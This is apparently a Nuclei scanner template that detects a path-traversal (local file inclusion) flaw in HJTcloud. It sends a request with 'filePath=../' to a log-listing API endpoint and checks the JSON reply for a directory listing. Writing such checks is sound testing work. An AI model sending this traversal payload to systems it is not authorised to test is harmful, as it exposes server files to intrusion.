id: hjtcloud-rest-arbitrary-file-read

info:
  name: HJTcloud - Local File Inclusion
  author: pikpikcu
  severity: high
  description: HJTcloud is vulnerable to local file inclusion.
  reference:
    - https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: hjtcloud,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/him/api/rest/V1.0/system/log/list?filePath=../"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '"name":'
          - '"length":'
          - '"filePath":'
          - '"list":'
        condition: and
        part: body

      - type: word
        words:
          - "application/json"
        part: header

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/03
